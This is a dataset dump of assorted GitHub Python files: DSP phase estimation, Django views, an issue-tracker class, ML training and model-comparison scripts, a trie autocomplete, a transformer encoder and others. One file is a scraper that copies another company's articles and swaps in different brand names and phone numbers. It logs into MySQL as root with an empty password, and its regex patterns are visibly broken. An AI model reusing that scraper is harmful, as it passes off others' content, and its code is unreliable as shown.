{'queue': 'repeat'}}","repo_name":"akm8877m16/dianfengNewBackend","sub_path":"celeryTasks/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20633265392","text":"#!/usr/bin/python\n\n# Example (make sure findPhase.py is executable and is in the current directory):\n# $ ./findPhase.py\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as 
plt\n#####################################################################################\n\n\n\ndef phs_est_adaptive_filter(data):\n    iqresult = [0,0]\n    for iqSelection in range(2):\n        data_one_arm = data[iqSelection:len(data):2]\n        phs_est = find_phase_regression(data_one_arm)\n        iqresult[iqSelection] = phs_est\n\n    #return modmPitoPi(iqresult[0] - iqresult[1] + np.pi/2)\n    return modmPitoPi((iqresult[0] + (iqresult[1] - np.pi/2))/2)\n\n\ndef find_phase_regression(d, phs_truth=\"\"):\n\n    print(np.mean(d))\n    plt.switch_backend('Agg')\n    plt.plot(d)\n    plt.ylabel('some numbers')\n    plt.show()\n    # Find frequency\n    D = np.abs(np.fft.fftshift(np.fft.fft(d * np.hamming(len(d)))))\n\n    f = np.arange(-0.5, 0.5-1.0/len(d), 1.0/len(d))\n    pos = D.argmax()\n\n    # Create x (synthetic sin wave)\n    x = np.sin(2*np.pi*np.arange(-1,len(D))*np.abs(f[pos]))\n\n\n    # Compute w\n    w = LS_local(np.asarray(d),x,2)\n\n    # Initialize\n    ph0 = 0\n    ph1 = -2*np.pi*np.abs(f[pos])\n\n    # Compute ph\n    ph = np.arctan( (w[0]*np.sin(ph0) + w[1]*np.sin(ph1)) / (w[0]*np.cos(ph0) + w[1]*np.cos(ph1)) )\n    if np.sign((w[0]*np.cos(ph0) + w[1]*np.cos(ph1))) < 0:\n        ph = ph - np.pi\n\n    ph = modmPitoPi(ph)\n\n\n\n    if phs_truth: # determine Empty String\n        phs_truth = modmPitoPi(phs_truth)\n        # Check\n        print(str(phs_truth) + \" = \" + str(ph) + \" ?\") # These should be (approximately) equal or off by an integer multiple of 2*pi\n    else:\n        #print(str(ph))\n        pass\n    # Return\n    return ph\n\n\ndef modmPitoPi(phs):\n    # Adjust phs_truth (-pi < phs_truth <= pi)\n    while phs <= -np.pi:\n        phs = phs + 2*np.pi\n    while phs > np.pi:\n        phs = phs - 2*np.pi\n    return phs\n\ndef LS_local(d,x,Lw):\n\n    # Initialize\n    d = d.astype('double')\n    x = x.astype('double')\n\n    # Initialize\n    Ld = len(d)\n    Lx = len(x)\n    #print(Lx)\n\n    # Check\n    if Lx != (Ld + Lw - 1):\n        raise Exception('Length of x or length of d is incorrect.')\n\n    # Build R\n    xx = np.zeros((Lw,Ld))+1\n    #print(xx)\n    for i in range(Lw):\n        xx[i] = x[Lw-i-1:Lw-i-1+Ld]\n    R = np.dot(xx, xx.transpose())\n\n    # Build p\n    p = np.dot(d, xx.transpose())\n\n    # Compute w\n    w = np.dot(np.linalg.inv(R), p.transpose())\n\n    return w\n\n#####################################################################################\n\n# Main\nif __name__ == '__main__':\n    for c in np.arange(24):\n        find_phase_regression(np.sin(2*np.pi*np.arange(1000)/100 + np.pi/12*c),np.pi/12*c)\n","repo_name":"xiapeiqing/ti_aoa","sub_path":"Host_workspaces/python_ws/pyHostDsp/CWphsEst.py","file_name":"CWphsEst.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
{"seq_id":"25843440477","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, status, renderers\nfrom rest_framework.decorators import api_view, detail_route\nfrom rest_framework.reverse import reverse\nfrom rest_framework.response import Response\n\nfrom .models import Test, Question, Category\nfrom .serializers import TestSerializer, QuestionSerializer, CategorySerializer\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n    queryset = Category.objects.all()\n    serializer_class = CategorySerializer\n\n    @detail_route()\n    def getTests(self, request, *args, **kwargs):\n        \"\"\"\n        Get tests of a category\n        \"\"\"\n        testQuery = Test.objects.filter(category=kwargs['pk'])\n        serializer = TestSerializer(testQuery, many=True)\n        return Response(serializer.data)\n\nclass TestViewSet(viewsets.ModelViewSet):\n    queryset = Test.objects.all()\n    serializer_class = TestSerializer\n\n    @detail_route()\n    def 
getQuestions(self, request, *args, **kwargs):\n \"\"\"\n Get questions of a test\n \"\"\"\n questionQuery = Question.objects.filter(test=kwargs['pk'])\n serializer = QuestionSerializer(questionQuery, many=True)\n return Response(serializer.data)\n\nclass QuestionViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n serializer_class = QuestionSerializer\n\n@api_view(['GET'])\ndef exams_root(request, format=None):\n return Response({\n 'categories': reverse('category-list', request=request, format=format),\n 'tests': reverse('test-list', request=request, format=format),\n 'questions': reverse('question-list', request=request, format=format),\n })","repo_name":"rcook7/resources","sub_path":"exams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7119811143","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Product\n\n@login_required\ndef create_product(request):\n if request.method == 'POST':\n product = Product(\n name=request.POST['name'],\n price=request.POST['price'],\n quantity=request.POST['quantity'],\n category=request.POST['category'],\n description=request.POST['description'],\n user=request.user\n )\n product.save()\n return redirect('product_list')\n return render(request, 'product/create_product.html')\n\n@login_required\ndef product_list(request):\n products = Product.objects.filter(user=request.user)\n return render(request, 'product/product_list.html', {'products': products})\n\n@login_required\ndef edit_product(request, product_id):\n product = get_object_or_404(Product, id=product_id, user=request.user)\n if request.method == 'POST':\n product.name = request.POST['name']\n product.price = request.POST['price']\n product.quantity = request.POST['quantity']\n product.category = request.POST['category']\n product.description = request.POST['description']\n product.save()\n return redirect('product_list')\n return render(request, 'product/edit_product.html', {'product': product})\n\n@login_required\ndef delete_product(request, product_id):\n product = get_object_or_404(Product, id=product_id, user=request.user)\n product.delete()\n return redirect('product_list')\n","repo_name":"redfieldC/MultiUser-CRUD-for-Products","sub_path":"project/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72171087023","text":"\"\"\"Issue object for working with issue tracker issues\"\"\"\n\nimport copy\nimport re\nfrom issue_tracker.change_tracking_list import ChangeTrackingList\nfrom issue_tracker.utils import parseDateTime\n\nclass Issue(object): # pragma: no cover\n def __init__(self, issue_entry):\n self.id = issue_entry.get('id')\n\n self.blocked_on = [e['issueId'] for e in issue_entry.get('blockedOn', [])]\n self.blocking = [e['issueId'] for e in issue_entry.get('blocking', [])]\n\n self.merged_into = issue_entry.get('mergedInto', {}).get('issueId')\n\n self.created = parseDateTime(issue_entry.get('published'))\n self.updated = parseDateTime(issue_entry.get('updated'))\n\n if issue_entry.get('closed', []):\n self.closed = parseDateTime(issue_entry.get('closed', []))\n else:\n self.closed = None\n\n self.summary = issue_entry.get('summary')\n self.description = issue_entry.get('description')\n 
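# author/owner arrive as nested dicts keyed by 'name'\n        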
self.reporter = issue_entry.get('author', {}).get('name')\n self.owner = issue_entry.get('owner', {}).get('name')\n self.status = issue_entry.get('status')\n self.stars = issue_entry.get('stars')\n self.open = issue_entry.get('state') == 'open'\n self.labels = ChangeTrackingList(issue_entry.get('labels', []))\n self.components = ChangeTrackingList(issue_entry.get('components', []))\n self.cc = ChangeTrackingList([e['name'] for e in issue_entry.get('cc', [])])\n\n self.dirty = False\n\n def __setattr__(self, name, value):\n self.__dict__.setdefault('dirty', False)\n self.__dict__.setdefault('changed', set())\n\n # If dirty flag was reset to false.\n if name == 'dirty' and not value:\n self.__dict__['labels'].reset()\n self.__dict__['cc'].reset()\n self.__dict__['changed'].clear()\n self.__dict__['dirty'] = value\n else:\n self.__dict__[name] = value\n self.__dict__['dirty'] = True\n self.__dict__['changed'].add(name)\n\n def addLabel(self, label):\n if not self.hasLabel(label):\n self.labels.append(label)\n self.dirty = True\n\n def __remove_label(self, label):\n for l in self.labels:\n if l.lower() == label.lower():\n self.labels.remove(l)\n self.dirty = True\n return\n\n def removeLabel(self, label):\n if self.hasLabel(label):\n self.__remove_label(label)\n self.addLabel('-%s' % label)\n\n def removeLabelByPrefix(self, prefix):\n labels = self.getLabelsByPrefix(prefix)\n for label in labels:\n self.removeLabel(label)\n\n def addCc(self, cc):\n if not self.hasCc(cc):\n self.cc.append(cc)\n self.dirty = True\n\n def removeCc(self, cc):\n if self.hasCc(cc):\n self.cc.remove(cc)\n self.dirty = True\n\n def getLabelsByPrefix(self, prefix):\n return self.getLabelsContaining('%s.*' % prefix)\n\n def getLabelByPrefix(self, prefix):\n rtn = self.getLabelsByPrefix(prefix)\n if rtn:\n return rtn[0]\n return None\n\n def getLabelsContaining(self, regex):\n rtn = []\n for label in self.labels:\n if re.match(regex, label, re.DOTALL | re.IGNORECASE):\n rtn.append(label)\n return rtn\n\n def getLabelsMatching(self, regex):\n return self.getLabelsContaining(regex + '\\Z')\n\n def hasLabelContaining(self, regex):\n for label in self.labels:\n if re.search(regex, label, re.DOTALL | re.IGNORECASE):\n return True\n return False\n\n def hasLabelMatching(self, regex):\n return self.hasLabelContaining(regex + '\\Z')\n\n def hasLabel(self, value):\n for label in self.labels:\n if label.lower() == value.lower():\n return True\n return False\n\n def hasCc(self, value):\n for cc in self.cc:\n if cc.lower() == value.lower():\n return True\n return False\n","repo_name":"eunchong/infra","sub_path":"appengine/chromium_try_flakes/issue_tracker/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"15715063161","text":"from abc import abstractmethod\nfrom modules.config.setting import SERVER_IP, PLATFORM_DOMAIN\nfrom modules.task.models import TaskConfigItem\n\n\nclass BaseTemplate:\n template_info = {\n \"name\": \"\", # 组件名\n \"title\": \"\", # 组件展示标题名\n \"author\": \"\", # 组件作者\n \"type\": 1, # 组件类型\n \"desc\": \"\", # 组件介绍\n \"desc_url\": \"\", # 组件使用说明链接\n \"choice_type\": 1, # 组件选择类型\n \"url_type\": 1, # 组件生成链接格式类型\n }\n\n def __init__(self):\n self.ip = SERVER_IP\n self.domain = PLATFORM_DOMAIN\n\n def run(self, key):\n task_config_item = TaskConfigItem.objects.filter(task_config__key=key)\n if task_config_item:\n config = [{\"name\": i.template_config_item.name, \"config\": i.value,}\n 
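# one entry per stored item: the template option's name and its saved value\n                      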
for i in\n task_config_item]\n else:\n config = []\n return self.generate(key, config)\n\n @abstractmethod\n def generate(self, key, config):\n pass\n","repo_name":"whitesharks/Antenna","sub_path":"modules/template/depend/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"} +{"seq_id":"39123306042","text":"#Importing the required libraries\r\nimport statsmodels.formula.api as smf\r\nimport numpy as np\r\nimport xgboost as xgb\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import train_test_split\r\n\r\narray=df_train.values\r\n\r\nX=array[:,0:4]\r\nY=array[:,4]\r\nX_train,X_test,Y_train,Y_test=train_test_split(X,Y,test_size=0.25,random_state=123)\r\n\r\nXg=xgb.XGBRegressor(colsample_bytree=0.9,learning_rate=0.2,max_depth=7,alpha=10,n_estimators=50)\r\n\r\nXg.fit(X_train,Y_train)\r\nXg_pred=Xg.predict(X_test)\r\n\r\n#Computing the RMSE for calculating the mean square error\r\nrmse=np.sqrt(mean_squared_error(Y_test,Xg_pred))\r\n###############################################################################################################\r\n#Deploying the model\r\nimport pickle\r\n# Saving model to disk\r\npickle.dump(Xg, open('FMCG.pkl','wb'))\r\n\r\n# Loading model to compare the results\r\nmodel = pickle.load(open('FMCG.pkl','rb'))\r\n\r\nscore = model.score(X_test, Y_test)\r\nprint(\"Test score: {0:.2f} %\".format(100 * score))\r\nYpredict = model.predict(X_test)\r\n\r\n##########################################################################################################\r\n#Visualizing the original and predicted data in a plot \r\nx_ax = range(len(Y_test))\r\nplt.scatter(x_ax, Y_test, s=5, color=\"blue\", label=\"original\")\r\nplt.plot(x_ax, Xg_pred, lw=0.8, color=\"red\", label=\"predicted\")\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yashraj-96/FMCG","sub_path":"Final model.py","file_name":"Final model.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"4389708464","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport re,os,requests,pymysql\n\nclass Spider:\n def __init__(self, host, user, passwd, db):\n # self.url_set = []\n self.img_path = 'www.7rcm.com'\n self.url = 'http://www.7rcm.com/index.php?r=post/Index&catalog=news_center&page='\n self.host = host\n self.user = user\n self.passwd = passwd\n self.db = db\n self.mysql = pymysql.connect(host=self.host, user=self.user, passwd=self.passwd, db=self.db, charset='utf8',cursorclass=pymysql.cursors.DictCursor)\n self.cursor = self.mysql.cursor()\n\n def run(self):\n try:\n for i in range(71, 73):\n self.GetUrl(self.url+str(i))\n except KeyboardInterrupt as e:\n print('[E] 退出')\n\n\n def Download(self,url):\n file_name = os.path.splitext(url)[0]\n file_suffix = os.path.splitext(url)[1]\n file_list = file_name.split('/')\n img_name = file_list.pop()\n img_brand = file_list.pop()\n img_paths = self.img_path + '/' + img_brand\n if not os.path.exists(img_paths):\n os.mkdir(img_paths)\n filename = '{}/{}{}'.format(img_paths, img_name, file_suffix)\n if not os.path.exists(filename):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n res = requests.get(url, headers=headers)\n with open(filename, 'wb') as f:\n f.write(res.content)\n return filename\n\n def GetUrl(self,url):\n headers = {\n 
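# identify as a desktop Chrome browser when requesting the listing page\n            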
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n }\n req = requests.get(url, headers=headers)\n html = req.content.decode('utf-8')\n for var in re.findall(r'.*?', html, re.S):\n pic = re.findall(r'',var,re.S)[0]\n pic_d = 'http://www.7rcm.com/'+ pic.replace('','').replace('\\r\\n', '').replace('\\t', '').replace(' ', '')\n pic = pic.replace('','').replace('\\r\\n', '').replace('\\t', '').replace(' ', '')\n self.Download(pic_d)\n title = re.findall(r'.*?',var,re.S)[0]\n title = '短视频剪辑:'+title.replace('', '').replace('','').replace('\\r\\n', '').replace('\\t', '').replace(' ', '')\n desc = re.findall(r'.*?',var,re.S)[0]\n desc = desc.replace('','').replace('','').replace('\\r\\n', '').replace('\\t', '').replace('影匠传奇','巨推科技').replace('七人传媒','巨推传媒').replace('010-52907209','010-86399611')\n url = re.findall(r'.*?', html_one, re.S):\n imgObj = re.findall(r'', var, re.S):\n content += content_one.replace('/uploads/','/caiji/').replace('\\r\\n', '').replace('\\t', '').replace('影匠传奇','巨推科技').replace('七人传媒','巨推传媒').replace('010-52907209','010-86399611').replace('版权声明:本文来源于网络,文章版权属原作者所有。若涉及版权问题,敬请与我们联系删除。
','')\n insertStr = \"'\"+pymysql.escape_string(title)+\"','\"+pic+\"','\"+pymysql.escape_string(content)+\"','\"+pymysql.escape_string(desc)+\"'\"\n sqlStr = 'insert into jutui_content(title,img,content,description) value(' + insertStr + ')'\n self.cursor.execute(sqlStr)\n print(title)\n\nSpider = Spider('127.0.0.1', 'root', '', 'jutui360')\nSpider.run()\n","repo_name":"jobhandsome/python","sub_path":"caiji/www.7rcm.com.py","file_name":"www.7rcm.com.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72166607022","text":"import copy\nfrom turtle import position\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\n\nclass VanillaEncoder(nn.Module):\n\n def __init__(self, d_model=256, nhead=8, num_encoder_layers=6,\n dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super().__init__()\n self.d_model = d_model\n self.nhead = nhead\n\n encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward,\n dropout, activation)\n self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src, mask, pos_embed, task_encoding, task_mask, task_pos_enc):\n # mask = True if padded\n if not isinstance(src, torch.Tensor):\n src = src[0]\n if not isinstance(mask, torch.Tensor):\n mask = mask[0]\n if not isinstance(pos_embed, torch.Tensor):\n pos_embed = pos_embed[0]\n # flatten NxCxHxW to HWxNxC\n bs, c, h, w = src.shape\n src = src.flatten(2).permute(2, 0, 1)\n pos_embed = pos_embed.flatten(2).permute(2, 0, 1)\n\n mask = mask.flatten(1)\n mask = torch.cat([mask, task_mask], dim=1)\n\n task_encoding = task_encoding.permute(1, 0, 2)\n src = torch.cat([src, task_encoding], dim=0)\n\n task_pos_enc = task_pos_enc.unsqueeze(0).repeat(bs, 1, 1).permute(1, 0, 2)\n pos_embed = torch.cat([pos_embed, task_pos_enc], dim=0)\n\n memory = self.encoder(src, src_key_padding_mask=mask, pos=pos_embed)\n\n return memory.permute(1, 0, 2)\n\n\nclass TransformerEncoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super().__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n\n def with_pos_embed(self, tensor, pos):\n return tensor if pos is None else tensor + pos\n\n def forward(self, src, src_mask=None, src_key_padding_mask=None, pos=None):\n q = k = self.with_pos_embed(src, pos)\n src2 = self.self_attn(q, k, value=src, attn_mask=src_mask,\n key_padding_mask=src_key_padding_mask)[0]\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self, encoder_layer, num_layers):\n super().__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n\n def forward(self, src, mask=None, src_key_padding_mask=None, 
pos=None):\n output = src\n for layer in self.layers:\n output = layer(output, src_mask=mask, src_key_padding_mask=src_key_padding_mask, pos=pos)\n\n return output\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")\n\n\ndef build_transformer_encoder(args):\n return VanillaEncoder(\n d_model=args.hidden_dim,\n dropout=args.dropout,\n nhead=args.nheads,\n dim_feedforward=args.dim_feedforward,\n num_encoder_layers=args.num_encoder_layers,\n )\n","repo_name":"huangjy-pku/ViTo","sub_path":"model/vito_mdetr/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"17627354563","text":"import cv2\nimport numpy as np\nimport pyautogui\nimport time\nimport serial\nimport serial.tools.list_ports\nports = serial.tools.list_ports.comports()\nfor i in range(10):\n time.sleep(1)\n print(f\"start in {10 - i}\")\n\nportlst = []\nport = \"\"\nduino = False\nfor port, desc, hwid in sorted(ports):\n portlst.append(port)\n print(\"{}: {} [{}]\".format(port, desc, hwid))\n\nif port != \"\":\n arduino = serial.Serial(port=port, baudrate=115200, timeout=.1)\n duino = True\n\ncount = 0\n\nwhile True:\n print(\"searching\")\n ss = pyautogui.screenshot()\n ss.save(r'D:\\echairC\\sadL.png')\n img_rgb = cv2.imread('sadL.png')\n template = cv2.imread('sadboy.png')\n w, h = template.shape[:-1]\n\n res = cv2.matchTemplate(img_rgb, template, cv2.TM_CCOEFF_NORMED)\n threshold = .3\n loc = np.where(res >= threshold)\n for pt in zip(*loc[::-1]): \n print(\"found\")\n if count == 0 and duino == True:\n print(\"b\")\n arduino.write(bytes(\"1\",\"utf-8\"))\n time.sleep(10)\n count += 1\n cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 255, 0), 2)\n count = 0\n\n cv2.imwrite('result.png', img_rgb)\n\n time.sleep(0.1)\n","repo_name":"Jerome-Honer/python-starter-kit","sub_path":"Serialcom/cv2/Serialcv.py","file_name":"Serialcv.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7564198980","text":"WORDS = ['dog', 'deer', 'deal']\n\n\n# O(N) naive method\n\ndef autocomplete(s):\n results = set()\n for word in WORDS:\n if word.startswith(s):\n results.add(word)\n return results\n\n\nprint(autocomplete('de'))\n\n\n# pre-process the dictionary with Trie structure and search with it. 
This way, at most O(N) (when every word in dictionary starts with the prefix we are looking for)\nENDS_HERE = '__ENDS_HERE'\n\n\nclass Trie(object):\n def __init__(self):\n self._trie = {}\n\n def insert(self, text):\n trie = self._trie\n for char in text:\n if char not in trie:\n trie[char] = {}\n trie = trie[char]\n trie[ENDS_HERE] = True\n\n def elements(self, prefix):\n d = self._trie\n for char in prefix:\n if char in d:\n d = d[char]\n else:\n return []\n return [prefix + x for x in self._elements(d)]\n\n def _elements(self, d):\n result = []\n for c, v in d.items():\n if c == ENDS_HERE:\n subresult = ['']\n else:\n subresult = [c + s for s in self._elements(v)]\n result.extend(subresult)\n return result\n\n def print_trie(self):\n print(self._trie)\n\n\ntrie = Trie()\nfor word in WORDS:\n trie.insert(word)\n\ndef autocomplete(s):\n return trie.elements(s)\n\n# trie.print_trie()\n\nprint(autocomplete('de'))\n","repo_name":"sj43/Code-Storage","sub_path":"DailyCodingProblem/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"19493240867","text":"# from paddlenlp.transformers.mt5 import MT5Model as PDT5Model\n# # from transformers.models.t5.modeling_t5 import T5Model as PTT5Model\n# from transformers import MT5Model as PTT5Model\n# import torch\n# import paddle\n\n# paddle.set_device(\"cpu\")\n\n# size = \"large\"\n# PREFIX = \"C:/Users/QYS/Desktop/\"\n# pt_model = PTT5Model.from_pretrained(f\"{PREFIX}torch/mt5-{size}\")\n# pt_model.eval()\n# pd_model = PDT5Model.from_pretrained(\"mt5-large\")\n# pd_model.eval()\n\n# with paddle.no_grad():\n# pd_outputs = pd_model(\n# **pd_model.dummy_inputs,return_dict=True\n# ).last_hidden_state\n\n# with torch.no_grad():\n# pt_outputs = pt_model(\n# **pt_model.dummy_inputs\n# ).last_hidden_state\n\n\n# def compare(a, b):\n# a = torch.tensor(a.numpy()).float()\n# b = torch.tensor(b.numpy()).float()\n# meandif = (a - b).abs().mean()\n# maxdif = (a - b).abs().max()\n# print(\"mean difference:\", meandif)\n# print(\"max difference:\", maxdif)\n\n\n# compare(pd_outputs, pt_outputs)\n\narticle = \"UN Offizier sagt, dass weiter verhandelt werden muss in Syrien.\"\nsummary = \"Weiter Verhandlung in Syrien.\"\n\n\n# torch output\nimport torch\nimport transformers\nfrom transformers import MT5Model, T5Tokenizer\n\nPREFIX = \"C:/Users/QYS/Desktop/\"\ntorch_model = MT5Model.from_pretrained(f\"{PREFIX}torch/mt5-large\")\ntorch_tokenizer = T5Tokenizer.from_pretrained(\"google/mt5-large\")\ntorch_model.eval()\n# print(\"111\",torch_model.dummy_inputs)\n\ntorch_inputs = torch_tokenizer(article, return_tensors=\"pt\")\nwith torch_tokenizer.as_target_tokenizer():\n labels = torch_tokenizer(summary, return_tensors=\"pt\")\nprint(\"input\", torch_inputs)\nprint(\"labels\", labels)\ntorch_outputs = torch_model(input_ids=torch_inputs[\"input_ids\"], decoder_input_ids=labels[\"input_ids\"])\n# print(\"output\", torch_outputs)\ntorch_logits = torch_outputs.last_hidden_state\ntorch_array = torch_logits.cpu().detach().numpy()\nprint(\"torch_prediction_logits shape:{}\".format(torch_array.shape))\nprint(\"torch_prediction_logits:{}\".format(torch_array))\n\n\n# paddle output\nimport paddle\nimport paddlenlp\nfrom paddlenlp.transformers.mt5 import MT5Model, T5Tokenizer\nimport numpy as np\n\n# paddle_model = BertForPretraining.from_pretrained(paddle_model_name)\npaddle_model = MT5Model.from_pretrained(\"mt5-large\")\npaddle_tokenizer = 
T5Tokenizer.from_pretrained(\"t5-large\")\npaddle_model.eval()\n# print(\"111\",paddle_model.dummy_inputs)\n\npaddle_inputs = paddle_tokenizer(article)\nlabels = paddle_tokenizer(summary)\n\npaddle_inputs = {k:paddle.to_tensor([v]) for (k, v) in paddle_inputs.items()}\nlabels = {k:paddle.to_tensor([v]) for (k, v) in labels.items()}\nprint(\"input\", paddle_inputs)\nprint(\"labels\", labels)\npaddle_outputs = paddle_model(input_ids=paddle_inputs[\"input_ids\"], decoder_input_ids=labels[\"input_ids\"],return_dict=True)\n# print(\"output\", paddle_outputs)\npaddle_logits = paddle_outputs.last_hidden_state\npaddle_array = paddle_logits.numpy()\nprint(\"paddle_prediction_logits shape:{}\".format(paddle_array.shape))\nprint(\"paddle_prediction_logits:{}\".format(paddle_array))\n\n\n# the output logits should have the same shape\nassert torch_array.shape == paddle_array.shape, \"the output logits should have the same shape, but got : {} and {} instead\".format(torch_array.shape, paddle_array.shape)\ndiff = torch_array - paddle_array\nprint(np.amax(abs(diff)))\nprint(np.mean(abs(diff)))\n","repo_name":"27182812/MT5_paddle","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"12036813728","text":"import numpy as np\n\n\ndef divide_cube(cube):\n x_mid = cube['x_min'] + (cube['x_max'] - cube['x_min']) / 2\n y_mid = cube['y_min'] + (cube['y_max'] - cube['y_min']) / 2\n z_mid = cube['z_min'] + (cube['z_max'] - cube['z_min']) / 2\n cubes = {0: {'x_min': cube['x_min'], 'y_min': cube['y_min'], 'z_min': cube['z_min'], 'x_max': x_mid, 'y_max': y_mid,\n 'z_max': z_mid},\n 1: {'x_min': x_mid, 'y_min': cube['y_min'], 'z_min': cube['z_min'], 'x_max': cube['x_max'], 'y_max': y_mid,\n 'z_max': z_mid},\n 2: {'x_min': cube['x_min'], 'y_min': y_mid, 'z_min': cube['z_min'], 'x_max': x_mid, 'y_max': cube['y_max'],\n 'z_max': z_mid},\n 3: {'x_min': x_mid, 'y_min': y_mid, 'z_min': cube['z_min'], 'x_max': cube['x_max'], 'y_max': cube['y_max'],\n 'z_max': z_mid},\n 4: {'x_min': cube['x_min'], 'y_min': cube['y_min'], 'z_min': z_mid, 'x_max': x_mid, 'y_max': y_mid,\n 'z_max': cube['z_max']},\n 5: {'x_min': x_mid, 'y_min': cube['y_min'], 'z_min': z_mid, 'x_max': cube['x_max'], 'y_max': y_mid,\n 'z_max': cube['z_max']},\n 6: {'x_min': cube['x_min'], 'y_min': y_mid, 'z_min': z_mid, 'x_max': x_mid, 'y_max': cube['y_max'],\n 'z_max': cube['z_max']},\n 7: {'x_min': x_mid, 'y_min': y_mid, 'z_min': z_mid, 'x_max': cube['x_max'], 'y_max': cube['y_max'],\n 'z_max': cube['z_max']}}\n return cubes\n\n\ndef in_cube(points, cube):\n \"\"\"\n\n :param points:\n :param cube:\n :return:\n \"\"\"\n x = np.array([item[0] for item in points])\n y = np.array([item[1] for item in points])\n z = np.array([item[2] for item in points])\n x_flag = np.logical_and(x >= cube['x_min'], x < cube['x_max'])\n y_flag = np.logical_and(y >= cube['y_min'], y < cube['y_max'])\n z_flag = np.logical_and(z >= cube['z_min'], z < cube['z_max'])\n flag = np.logical_and(np.logical_and(x_flag, y_flag), z_flag)\n points_in = []\n for point, flag in zip(points, flag):\n if flag:\n points_in.append(point)\n return points_in, len(points_in)\n\n\ndef compute_max_cube(points):\n cm = [np.mean([item[0] for item in points]), np.mean([item[1] for item in points]),\n np.mean([item[2] for item in points])]\n max_dim = np.abs(max([item[0] for item in points]) - cm[0])\n max_dim = max(np.abs(min([item[0] for item in points]) - cm[0]), 
